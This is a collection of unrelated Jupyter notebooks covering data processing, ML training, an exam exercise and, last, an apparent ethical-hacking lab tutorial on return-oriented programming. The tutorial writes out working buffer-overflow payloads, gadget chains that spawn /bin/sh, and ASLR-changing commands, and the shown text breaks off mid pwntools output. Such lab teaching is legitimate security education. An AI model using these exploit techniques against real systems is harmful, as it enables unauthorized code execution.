# The extracted elements are then stored in respective variables which we'll put in a dictionary. With this information, we can then comfortably append the dictionary object to the initialized result list set before our for loop.
#
# ```python
# single ={'title':title,'stars':stars,'price':price,'link':link,'picture':picture}
# result.append(single)
# with open('books2.json','w') as f:
# json.dump(result,f,indent=4)
# ```
#
# Finally, store the python list in a JSON file by the name "books.json" with an indent of 4 for readability purposes.
|
_site/lectures/Week 06 - Web Scraping/01. Introduction to Web Scraping.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
"""
MAC0417 - EP2
Nome: <NAME>
NUSP: 9763832
IMPORTANTE: apenas a função de normalização foi implementada. As funções de
criação dos histogramas NÃO foram implementadas. Não consegui terminá-las a tempo
A execução das funções foi feita baseada na seguinte árvore de diretórios:
analysis_functions.ipynb
augmentedDataset/
|---- exp/
|---- <imagens com aplicação da exponencial>
grey/
|---- <imagens convertidas de RGB para escalas de cinza>
log/
|---- <imagens com aplicação do logaritmo>
mean/
|---- <imagens com aplicação do filtro da média>
sum/
|---- <imagens com aplicação do gradiente>
normalizedDataset/
|---- <imagens com aplicação da normalização>
"""
from os import listdir
from skimage import io
from skimage import exposure
grey_imgs = listdir("augmentedDataset/grey/")
sum_imgs = listdir("augmentedDataset/sum/")
log_imgs = listdir("augmentedDataset/log/")
exp_imgs = listdir("augmentedDataset/exp/")
mean_imgs = listdir("augmentedDataset/mean/")
# Recebe o nome das imagens em escala de cinza e
# aplica a normalização por equalização de histogramas
def normalize_with_equalization(imgs, folder):
for name in imgs:
img = io.imread("augmentedDataset/" + folder + "/" + name)
norm_img = exposure.equalize_hist(img)
new_name = name.replace(".jpg", "_normalizado.jpg")
io.imsave("normalizedDataset/" + folder + "/" + new_name, norm_img)
# Criação das imagens normalizadas
normalize_with_equalization(grey_imgs, "grey")
normalize_with_equalization(sum_imgs, "sum")
normalize_with_equalization(log_imgs, "log")
normalize_with_equalization(exp_imgs, "exp")
normalize_with_equalization(mean_imgs, "mean")
|
EP2/analysis_functions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: env_calidad_aire
# language: python
# name: env_calidad_aire
# ---
# # Procesamiento de viajes de Ecobici
# __Descripción:__
#
# Se obtiene el AGEB de origen y destino de los viajes de los viajes de ecobici y se obtiene el agregado primedio de los viajes entre AGEBS por hora.
#
# __Input__
#
# - Estaciones de ecobici: Estaciones de ecobici con clave AGEB obtenida de __Uber © 2019 Copyright Uber Technologies, Inc.Data Attributions__
#
# - <NAME> 2019
# Responsable: Ecobici
#
#
import pandas as pd
# ## Estaciones
# +
df_estaciones = pd.read_csv('../data/SIG/procesado/CSV/estaciones-de-ecobici_con_AGEB.csv',sep=',')
df_estaciones['CVE_AGEB'] = [''.join(filter(lambda x: x.isdigit(), row)) for row in df_estaciones['CVE_AGEB']]
df_estaciones['CVE_AGEB'] = df_estaciones['CVE_AGEB'].astype(int)
df_estaciones.sort_values("ID").head(5)
# -
# ## Prueba
# + active=""
# set(df_estaciones["ID"]) - set(df_viajes["Ciclo_Estacion_Arribo"])
# -
# ## Viajes ecobici
df_viajes = pd.read_csv('../data/ecobici/ecobici_2019.csv',sep=',')
df_viajes.head()
# ### merge viajes e info de estaciones
#
# Se obtiene ageb por estación de origen y destino.
# #### Clave AGEB arribo
df_viajes_ageb = df_viajes.merge(df_estaciones[['ID','CVE_AGEB',"Nombre"]], left_on='Ciclo_Estacion_Retiro', right_on='ID')
df_viajes_ageb.rename(columns={'CVE_AGEB': 'CVE_AGEB_retiro'}, inplace=True)
df_viajes_ageb.head()
# #### Clave AGEB destino
df_viajes_ageb = df_viajes_ageb.merge(df_estaciones[['ID','CVE_AGEB',"Nombre"]], left_on='Ciclo_Estacion_Arribo', right_on='ID')
df_viajes_ageb.rename(columns={'CVE_AGEB': 'CVE_AGEB_arribo'}, inplace=True)
df_viajes_ageb.head()
# ## Renombramos las columnas de nombre:
df_viajes_ageb.rename({"Nombre_x":"nombre_estacion_retiro","Nombre_y":"nombre_estacion_arribo"},axis=1,inplace=True)
df_viajes_ageb.head()
# ### Eliminamos columnas no usadas
df_viajes_ageb.columns
df_viajes_ageb.drop(['Unnamed: 9','ID_x','ID_y'], axis=1, inplace=True)
df_viajes_ageb.head()
df_viajes_ageb[df_viajes_ageb["CVE_AGEB_retiro"]==118]
# ## Obtenemos la columna de hora de retiro:
df_viajes_ageb['Hora_Retiro_round'] = df_viajes_ageb['Hora_Retiro'].str.split(':').str[0].astype(int)
df_viajes_ageb.head()
# ## Obtenemos el tiempo de cada viaje:
# Eliminamos filas con errores de formato:
df_viajes_ageb[df_viajes_ageb['Hora_Retiro']=='18::']
index_number = df_viajes_ageb[df_viajes_ageb['Hora_Retiro']=='18::'].index.values[0]
df_viajes_ageb.drop([index_number],inplace=True)
# Convetimos a datetime:
# +
df_viajes_ageb['Hora_Retiro'] = pd.to_datetime(df_viajes_ageb['Hora_Retiro'], format='%H:%M:%S')
df_viajes_ageb['Hora_Arribo'] = pd.to_datetime(df_viajes_ageb['Hora_Arribo'], format='%H:%M:%S')
# -
# Verificamos que las horas de arribo y reutro sean datetime
# restamos las columnas para obtener el tiempo
df_viajes_ageb['duracion_viaje'] = df_viajes_ageb['Hora_Arribo'] - df_viajes_ageb['Hora_Retiro']
df_viajes_ageb['duracion_viaje_minutos'] = df_viajes_ageb['duracion_viaje'].astype('str').str.split(':').str[1].astype(int)
df_viajes_ageb.head()
df_viajes_ageb.drop(['Bici','Fecha_Arribo',
'Fecha_Retiro','duracion_viaje','Hora_Arribo','Hora_Retiro'], axis=1, inplace=True)
df_viajes_ageb.head()
# ### Estos datos se usaran para obtener los viajes de una estación a otra por ageb.
df_viajes_ageb.to_csv('../data/procesado/datos_ecobici_por_ageb.csv',index=False)
df_viajes_ageb.head()
# ### Obtención de genero de usuarios por viaje:
df_viajes_ageb['Genero_Usuario_F'] = pd.get_dummies(df_viajes_ageb['Genero_Usuario'])["F"]
df_viajes_ageb['Genero_Usuario_M'] = pd.get_dummies(df_viajes_ageb['Genero_Usuario'])["M"]
print(df_viajes_ageb['CVE_AGEB_retiro'].nunique(),df_viajes_ageb['CVE_AGEB_arribo'].nunique())
df_viajes_ageb.head()
print(df_viajes_ageb['CVE_AGEB_retiro'].nunique(),df_viajes_ageb['CVE_AGEB_arribo'].nunique())
# ## Definimos periodos del día para non graficar todas las horas:
# +
def periodo_hora(row):
if row in [7,8,9]:
return "7-10"
elif row in[10,11,12]:
return "10-13"
elif row in [13,14,15]:
return "13-16"
elif row in [16,17,18]:
return "16-19"
elif row in [19,20,21]:
return "19-22"
elif row in [22,23,0]:
return "22-1"
else:
return None
df_viajes_ageb["Hora_Retiro_bin"] = df_viajes_ageb["Hora_Retiro_round"].apply(periodo_hora)
df_viajes_ageb = df_viajes_ageb.dropna()
# -
df_viajes_ageb_agg = df_viajes_ageb.groupby(['CVE_AGEB_arribo','CVE_AGEB_retiro','Hora_Retiro_bin' ]).agg({'Edad_Usuario':['count', 'mean'],
'duracion_viaje_minutos':['mean','min','max'],
'Genero_Usuario_F':['sum'],
'Genero_Usuario_M':['sum'],
}).reset_index(drop=False)
df_viajes_ageb_agg.columns = ['_'.join(col) for col in df_viajes_ageb_agg.columns]
df_viajes_ageb_agg.head(5)
# Definimos una función para obtener el número de mujeres y de hombres:
def procentaje_homvres(row):
return round(row['Genero_Usuario_M_sum']*10 / (row['Genero_Usuario_F_sum'] + row['Genero_Usuario_M_sum']),0)
df_viajes_ageb_agg['porcentage_hombres'] = df_viajes_ageb_agg.apply(procentaje_homvres, axis=1)
df_viajes_ageb_agg['porcentage_mujeres'] = 10 - df_viajes_ageb_agg['porcentage_hombres']
df_viajes_ageb_agg.head()
df_viajes_ageb_agg.to_csv('../data/production_data/viajes_ecobici.csv',index=False)
df = pd.read_csv("../data/production_data/viajes_ecobici.csv")
df[df["CVE_AGEB_retiro_"]==118]
|
jupyter_notebooks/procesamiento_datos_ecobici.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 1.5.2
# language: julia
# name: julia-1.5
# ---
# # Factor Graphs
#
# - **[1]** Consider the following state-space model:
# $$\begin{align*}
# z_k &= A z_{k-1} + w_k \\
# x_k &= C z_k + v_k
# \end{align*}$$
# where $k=1,2,\ldots,n$ is the time step counter; $z_k$ is an *unobserved* state sequence; $x_k$ is an *observed* sequence; $w_k \sim \mathcal{N}(0,\Sigma_w)$ and $v_k \sim \mathcal{N}(0,\Sigma_v)$ are (unobserved) state and observation noise sequences respectively; $z_0 \sim \mathcal{N}(0,\Sigma_0)$ is the initial state and $A$, $C$, $\Sigma_v$,$\Sigma_w$ and $\Sigma_0$ are known parameters. The Forney-style factor graph (FFG) for one time step is depicted here:
# <img src="./i/ffg-5SSB0-exam-Kalman-filter.png" style="width:500px;">
# (a) Rewrite the state-space equations as a set of conditional probability distributions.
# $$\begin{align*}
# p(z_k|z_{k-1},A,\Sigma_w) &= \ldots \\
# p(x_k|z_k,C,\Sigma_v) &= \ldots \\
# p(z_0|\Sigma_0) &= \ldots
# \end{align*}$$
# (b) Define $z^n \triangleq (z_0,z_1,\ldots,z_n)$, $x^n \triangleq (x_1,\ldots,x_n)$ and $\theta=\{A,C,\Sigma_w,\Sigma_v\}$. Now write out the generative model $p(x^n,z^n|\theta)$ as a product of factors.
# (c) We are interested in estimating $z_k$ from a given estimate for $z_{k-1}$ and the current observation $x_k$, i.e., we are interested in computing $p(z_k|z_{k-1},x_k,\theta)$. Can $p(z_k|z_{k-1},x_k,\theta)$ be expressed as a Gaussian distribution? Explain why or why not in one sentence.
# (d) Copy the graph onto your exam paper and draw the message passing schedule for computing $p(z_k|z_{k-1},x_k,\theta)$ by drawing arrows in the factor graph. Indicate the order of the messages by assigning numbers to the arrows.
# (e) Now assume that our belief about parameter $\Sigma_v$ is instead given by a distribution $p(\Sigma_v)$ (rather than a known value). Adapt the factor graph drawing of the previous answer to reflects our belief about $\Sigma_v$.
#
#
#
|
lessons/exercises/Exercises-Factor-Graphs.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Training an agent to Walk
# Now let us learn how to train a robot to walk using Gym along with some fundamentals.
# The strategy is that reward X points will be given when the robot moves forward and if the
# robot fails to move then Y points will be reduced. So the robot will learn to walk in the
# event of maximizing the reward.
#
# First, we will import the library, then we will create a simulation instance by make
# function.
#
#
# Open AI Gym provides an environment called BipedalWalker-v2 for training
# robotic agents in simple terrain.
import gym
env = gym.make('BipedalWalker-v3')
# Then for each episode (Agent-Environment interaction between initial and final state), we
# will initialize the environment using reset method.
for episode in range(100):
observation = env.reset()
# Render the environment on each step
for i in range(10000):
env.render()
# we choose action by sampling random action from environment's action space. Every environment has
# some action space which contains the all possible valid actions and observations,
action = env.action_space.sample()
# Then for each step, we will record the observation, reward, done, info
observation, reward, done, info = env.step(action)
# When done is true, we print the time steps taken for the episode and break the current episode.
if done:
print("{} timesteps taken for the Episode".format(i+1))
break
# The agent will learn by trail and error and over a period of time it starts selecting actions which gives the
# maximum rewards.
|
Chapter02/2.08 Training an Robot to Walk.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import matplotlib.pyplot as plt
import import_ipynb
from model import *
torch.cuda.set_device(3)
# +
transform = transforms.Compose([transforms.RandomHorizontalFlip(),
transforms.RandomCrop(32, padding=4),
transforms.ToTensor()])
train_dataset = torchvision.datasets.CIFAR10(root='./data/',
train=True,
transform=transform,
download=True)
test_dataset = torchvision.datasets.CIFAR10(root='./data/',
train=False,
transform=transforms.ToTensor(),
download=True)
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=128,
shuffle=True,
num_workers=4)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=128,
shuffle=False,
num_workers=4)
# +
# For the result of resnets, see the document.
net1 = Plain20().to(device)
net2 = Plain32().to(device)
net3 = Plain44().to(device)
net4 = Plain56().to(device)
#net5 = ResNet20().to(device)
#net6 = ResNet32().to(device)
#net7 = ResNet44().to(device)
#net8 = ResNet56().to(device)
# -
net_group = [net1, net2, net3, net4]
#net_group = [net5, net6, net7, net8]
# +
def update_lr(optimizer, lr):
for param_group in optimizer.param_groups:
param_group['lr'] = lr
total_step = len(train_loader)
train_error = []
test_error = []
for net in net_group:
model_train_error = []
model_test_error = []
train_total = 0
train_correct = 0
test_total = 0
test_correct = 0
learning_rate=0.1
num_epochs = 200
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(net.parameters(), lr=learning_rate, momentum=0.9, weight_decay=0.0001)
# training
iteration=0
for epoch in range(num_epochs):
for i, (images, labels) in enumerate(train_loader):
images = images.to(device)
labels = labels.to(device)
output = net(images)
loss = criterion(output, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
iteration += 1
_, predict = torch.max(output.data, 1)
train_total += labels.size(0)
train_correct += (predict != labels).sum().item()
# error evaluation
if iteration % 300 == 0:
model_train_error.append(100*train_correct/train_total)
train_total = 0
train_correct = 0
with torch.no_grad():
for j, (image, label) in enumerate(test_loader):
image = image.to(device)
label = label.to(device)
outputs = net(image)
_, prediction = torch.max(outputs.data, 1)
test_total += label.size(0)
test_correct += (prediction != label).sum().item()
model_test_error.append(100*test_correct/test_total)
test_total = 0
test_correct = 0
#debugging
if (epoch+1) % 10 == 0:
print ("Epoch [{}/{}], Loss: {:.4f}".format(epoch+1, num_epochs, loss.item()))
# lr decay at 32k & 48k iter, according to the paper
if epoch == 80 or epoch == 120:
learning_rate /= 10
update_lr(optimizer, learning_rate)
# termination at 64k iter, according to the paper
if iteration > 64000:
print("Test Error: {:.2f}%".format(model_test_error[-1]))
#torch.save(net.state_dict(), "./resnet.pth")
break
train_error.append(model_train_error)
test_error.append(model_test_error)
del net
# +
it = [i*300 for i in list(range(1, 214))]
# I did not use for-loop, just to clearly show there are 8 networks in experiment.
net1_train_error = train_error[0][:213]
net2_train_error = train_error[1][:213]
net3_train_error = train_error[2][:213]
net4_train_error = train_error[3][:213]
net1_test_error = test_error[0][:213]
net2_test_error = test_error[1][:213]
net3_test_error = test_error[2][:213]
net4_test_error = test_error[3][:213]
#net5_train_error = train_error[0][:213]
#net6_train_error = train_error[1][:213]
#net7_train_error = train_error[2][:213]
#net8_train_error = train_error[3][:213]
#net5_test_error = test_error[0][:213]
#net6_test_error = test_error[1][:213]
#net7_test_error = test_error[2][:213]
#net8_test_error = test_error[3][:213]
# +
fig = plt.figure(figsize=(12,8))
plt.plot(it, net1_train_error, 'b', linewidth=0.5)
plt.plot(it, net1_test_error, 'b', linewidth=2, label='plain-20')
plt.plot(it, net2_train_error, 'g',linewidth=0.5)
plt.plot(it, net2_test_error, 'g', linewidth=2, label='plain-32')
plt.plot(it, net3_train_error, 'r', linewidth=0.5)
plt.plot(it, net3_test_error, 'r', linewidth=2, label='plain-44')
plt.plot(it, net4_train_error, 'c', linewidth=0.5)
plt.plot(it, net4_test_error, 'c', linewidth=2, label='plain-56')
#plt.plot(it, net5_train_error, 'b', linewidth=0.5)
#plt.plot(it, net5_test_error, 'b', linewidth=2, label='ResNet-20')
#plt.plot(it, net6_train_error, 'g',linewidth=0.5)
#plt.plot(it, net6_test_error, 'g', linewidth=2, label='ResNet-32')
#plt.plot(it, net7_train_error, 'r', linewidth=0.5)
#plt.plot(it, net7_test_error, 'r', linewidth=2, label='ResNet-44')
#plt.plot(it, net8_train_error, 'c', linewidth=0.5)
#plt.plot(it, net8_test_error, 'c', linewidth=2, label='ResNet-56')
plt.ylim(0, 25)
plt.legend(loc='lower left')
fig.savefig('error.png')
plt.show()
# -
|
AI502/ResNet/main2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Return Oriented Programming (ROP)
# - [https://en.wikipedia.org/wiki/Return-oriented_programming](https://en.wikipedia.org/wiki/Return-oriented_programming)
# - [Return-Oriented Programming: Systems, Languages, and Applications](https://hovav.net/ucsd/dist/rop.pdf)
# - advanced version of stack overflow or stack smashing attack
# - a security exploit technqiue that allows an attacker to execute code in the presence of security defenses such as executable protection and code signing
# - attackers hijack's the program return control flow and the executes carefully chosen machine instruction sequences that are already present in the machine's memory, called `gadgets`
#
# ## Return-to-libc attack
# - if stack propery is set as RW (Read and Write, by default), it is impossible to smuggle the shellcode into buffer and use it to exploit the vulnerable program
# - shared libraries such as libc, often contain subroutines for performing system system calls and other functionality potentially useful to an attacker
# - we'll use c-program for this demonstration because most CTF platforms use C programs
# - in `return-to-libc` attack, attacker chooses available library function and overwrities the return address with its entry location
# - function calls can be carefully combined and chained using the `rop gadgets`
# - to make the demo easier, the `ctf-demos/rop1/vuln.c `program already exposes `system()`, and `printf()` inn libc and `main()` addresses in the when the program is loaded in memory
# - NOTE: the program and note is adapted from: [https://tc.gts3.org/cs6265/2019/tut/tut06-01-rop.html](https://tc.gts3.org/cs6265/2019/tut/tut06-01-rop.html)
# ! cat ctf-demos/rop1/vuln.c
# - use the Makefile provided in the `ctf-demos/rop1` folder to compile the c program
# - note that the gcc compiler switch `-z execstack` is removed from the Makefile
# - this make the stack RW only thus protecting from smuggling attacker's arbitrary code
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ sudo make
# # must run make with sudo to disable randomaize_va_space
# # #echo 0 | tee /proc/sys/kernel/randomize_va_space
# gcc -g -Wall -m32 -fno-stack-protector -no-pie vuln.c -o vuln.exe -ldl
#
# ```
#
# - double check to make sure NX is enabled
# - one can't place shellcode neither in stack no heap
# - however, stack protector is disabled allowing us to still hijack the control flow
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ checksec vuln.exe 2 ⨯
# [*] '/home/kali/EthicalHacking/ctf-demos/rop1/vuln.exe'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
# ```
# - run and crash the program to confirm overflow vulnerability
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe AAAA
# stack : 0xffffc3f0
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: <PASSWORD>
# Invalid Password!
# Good bye!
# ```
#
# - try with longer data
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe $(python -c 'print("A"*100)')
# stack : 0xffffc390
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: <PASSWORD>
# Invalid Password!
# zsh: segmentation fault ./vuln.exe $(python -c 'print("A"*100)')
# ```
# - check the EIP value when the program crashed
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ dmesg
#
# ...
# [44824.285344] vuln.exe[23971]: segfault at 41414141 ip 0000000041414141 sp 00000000ffffc340 error 14 in libc-2.31.so[f7dc2000+1d000]
# ...
# ```
# - notice 41414141 is the value of EIP when the function tries to return to this address
# - let's try to return to main() with argument the address of "/bin/sh"
# - payload should look like this:
# ```
# [data ]
# [... ]
# [ra ] -> main()
# ```
#
# - find the offset to the return address or EIP using gdb-peda
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ gdb -q vuln.exe
# Reading symbols from vuln.exe...
#
# gdb-peda$ pattern arg 200
# Set 1 arguments to program
#
# gdb-peda$ run
# ...
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41414641 in ?? ()
#
# gdb-peda$ patts
# Registers contain pattern buffer:
# ECX+52 found at offset: 69
# EDX+52 found at offset: 69
# EBX+0 found at offset: 36
# EBP+0 found at offset: 40
# EIP+0 found at offset: 44
# Registers point to pattern buffer:
# [ESP] --> offset 48 - size ~152
# [ESI] --> offset 128 - size ~72
# Pattern buffer found at:
# 0x0804d1b2 : offset 0 - size 200 ([heap])
# 0xf7fb00a9 : offset 33208 - size 4 (/usr/lib32/libdl-2.31.so)
# 0xffffc240 : offset 0 - size 200 ($sp + -0x30 [-12 dwords])
# 0xffffc5ed : offset 0 - size 200 ($sp + 0x37d [223 dwords])
# References to pattern buffer found at:
# 0xffffc368 : 0xffffc5ed ($sp + 0xf8 [62 dwords])
#
# ```
# - 44 is the offset to EIP that get's us to the return address from the buffer's base address
#
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe $(python -c 'import sys; sys.stdout.buffer.write(b"A"*44+b"\x56\x92\x04\x08")') 139 ⨯
# stack : 0xffffc3c0
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<PASSWORD>�
# Invalid Password!
# stack : 0xffffc374
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# zsh: segmentation fault ./vuln.exe
# ```
#
# - note the main is called right after Invalid Password! is printed and we get segfault after that
#
# - let's print out "Password OK :)"
# - payload should look like this:
#
# ```
# [data ]
# [..... ]
# [ra ] -> printf()
# [dummy ]
# [arg1 ] -> "Password OK :)"
# ```
#
# - printf() address is already printed, now we need to find the address of the literal string "Password OK :)" in the program
# - we'll use gdb-peda's find function
# - for dummy value we can use the exit() address and simply exit the program
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ gdb -q vuln.exe
# Reading symbols from vuln.exe...
#
# gdb-peda$ run
#
# gdb-peda$ find "Password OK :)"
# Searching for 'Password OK :)' in: None ranges
# Found 2 results, display max 2 items:
# vuln.exe : 0x804a03e ("Password OK :)")
# vuln.exe : 0x804b03e ("Password OK :)")
#
# ```
#
# - can use one of the addresses found; let's use the first address found
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe $(python -c 'import sys; sys.stdout.buffer.write(b"A"*44 + b"\x80\x5f\xe1\xf7" + b"\xb0\x98\xdf\xf7" + b"\x3e\xa0\x04\x08")')
# stack : 0xffffc3c0
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: <PASSWORD>������>�
# Invalid Password!
# Password OK :)
# ```
#
# - we forced the program to print "Password OK :)" string instead of "Invalid Password!"
#
# ## Your first ROP
# - force the vulnerable program execute to system function, e.g.:
#
# ```
# system("/bin/sh")
# ```
#
# - we need the address of `system()` and the address of `"/bin/sh"`
# - address of `system()` is already leaked but can also be found using gdb-peda
# - address of `"/bin/sh"` can be found in `libc` library loaded along with the program in memory
# - we can use gdb-peda to find the address of such strings to be used as argument to system
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ gdb -q vuln.exe
# Reading symbols from vuln.exe...
# gdb-peda$ run
#
# ...
#
# gdb-peda$ find "/bin/sh" libc
# Searching for '/bin/sh' in: libc ranges
# Found 1 results, display max 1 items:
# libc : 0xf7f4e33c ("/bin/sh")
#
# gdb-peda$ p system
# $1 = {<text variable, no debug info>} 0xf7e06f60 <system>
# gdb-peda$ p exit
# $2 = {<text variable, no debug info>} 0xf7df98b0 <exit>
# gdb-peda$ p main
# $3 = {int (int, char **)} 0x8049256 <main>
# gdb-peda$ p printf
# $4 = {<text variable, no debug info>} 0xf7e15f80 <printf>
#
# ```
#
# - now we've all the pointers, let's create our payload
#
# ```
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe $(python -c 'import sys; sys.stdout.buffer.write(b"A"*44 + b"\x60\x6f\xe0\xf7" + b"\xb0\x98\xdf\xf7" + b"\x3c\xe3\xf4\xf7")')
# stack : 0xffffc3c0
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: <PASSWORD>`o������<���
# Invalid Password!
# $ whoami
# kali
# $ ls
# core exploit.bin Makefile peda-session-demo.exe.txt ropchain vuln.exe
# demo.exe exploit.py pattern.txt peda-session-vuln.exe.txt vuln.c
# $ exit
# ```
# ## ROP Chain
# - find and chain `pop, ret` instructions called gadgets to keep maintaining our payloads
# - hence the the name return-oriented programming (ROP)
#
# - think about:
#
# ```
# [buf ]
# [..... ]
# [old-ra ] -> 1) func1
# [ra ] -------------------> 2) func2
# [old-arg1 ] -> 1) arg1
# [arg1 ] -> arg1
#
# 1) func1(arg1)
# 2) func2(arg1)
# 3) crash @func1's arg1 (old-arg1)
# ```
#
# - after func2(arg1), `old-arg1` will be our next return address in the payload
# - a neat trick is to use `pop/ret` gadget
#
# ```
# [buf ]
# [..... ]
# [old-ra ] -> 1) func1
# [ra ] ------------------> pop/ret gadget
# [old-arg1 ] -> 1) arg1
# [dummy ]
#
# * crash at dummy!
# ```
#
# - in this case, after func1(arg1), it returns to 'pop/ret' instructions, which 1) pop 'old-arg1' (note the stack pointer points to 'dummy') and 2) returns again (i.e., crashing at dummy)
#
# - we can chain func2 by hijacking its control-flow to func2
#
# ```
# [buf ]
# [..... ]
# [old-ra ] -> 1) func1
# [ra ] ------------------> pop/ret gadget
# [old-arg1 ] -> 1) arg1
# [ra ] -> func2
# [dummy ]
# [arg1 ] -> arg1
# ```
#
# - let's search for `pop/ret` gadgets using ropper program
# - there are many `pop/ret` instructions in a given program
#
# ```bash
#
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ropper -f ./vuln.exe
#
# ...
# 0x0804901e: pop ebx; ret;
# ...
#
# 155 gadgets found
#
# ```
#
# - let's chain the gadgets to create the final payload that looks like the following
#
# ```
# [buf ]
# [..... ]
# [old-ra ] -> 1) system
# [ra ] -----------------> pop/ret
# [old-arg1 ] -> 1) "/bin/sh"
# [ra ] -> 2) exit
# [dummy ]
# [arg1 ] -> 0
# ```
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe $(python -c 'import sys; sys.stdout.buffer.write(b"A"*44 + b"\x60\x6f\xe0\xf7" + b"\x1e\x90\x04\x08" + b"\x3c\xe3\xf4\xf7" + b"\xb0\x98\xdf\xf7" + b"AAAA" + b"0")')
#
# stack : 0xffffc3b0
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: <PASSWORD>`o��<�������AAAA0
# Invalid Password!
# $ whoami
# kali
# $ exit
#
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$
# ```
#
# ## Exercise
#
# - Chain three functions and invoke one at a time in a sequence listed below:
#
# ```C
# printf("Password OK :)")
# system("/bin/sh")
# exit(0)
# ```
# ## ROP with Pwntools
# - pwntools can be used to exploit stackoverflow with ROP technique
# - let's use `ctf-demos/rop2/vuln.c` program to demostrate pwntools
# - also see this YouTube video - [https://www.youtube.com/watch?v=gWU2yOu0COk&ab_channel=ChristopherSchafer](https://www.youtube.com/watch?v=gWU2yOu0COk&ab_channel=ChristopherSchafer)
# - since the exploit doesn't rely on any static addresses, it's reliable enough that it'll work even if ASLR is turned off
# - let's turn the ASLR off
# ! echo kali | sudo -S bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space'
# ! echo kali | sudo -S cat /proc/sys/kernel/randomize_va_space
# - create offset using `pwn template`
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop2]
# └─$ pwn template ./vuln.exe --host localhost --port 1234 > exploit.py
# ```
#
# - update and run exploit.py locally in DEBUG mode
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop2]
# └─$ python exploit.py LOCAL DEBUG
# [DEBUG] PLT 0x8049030 fflush
# [DEBUG] PLT 0x8049040 gets
# [DEBUG] PLT 0x8049050 getegid
# [DEBUG] PLT 0x8049060 puts
# [DEBUG] PLT 0x8049070 __libc_start_main
# [DEBUG] PLT 0x8049080 setresgid
# [*] '/home/kali/EthicalHacking/ctf-demos/rop_basic/vuln.exe'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
# [+] Starting local process '/home/kali/EthicalHacking/ctf-demos/rop_basic/vuln.exe': pid 12899
# [*] Loaded 10 cached gadgets for './vuln.exe'
# [DEBUG] PLT 0x25040 realloc
# [DEBUG] PLT 0x25090 __tls_get_addr
# [DEBUG] PLT 0x250d0 memalign
# [DEBUG] PLT 0x250e0 _dl_exception_create
# [DEBUG] PLT 0x25120 __tunable_get_val
# [DEBUG] PLT 0x251e0 _dl_find_dso_for_object
# [DEBUG] PLT 0x25220 calloc
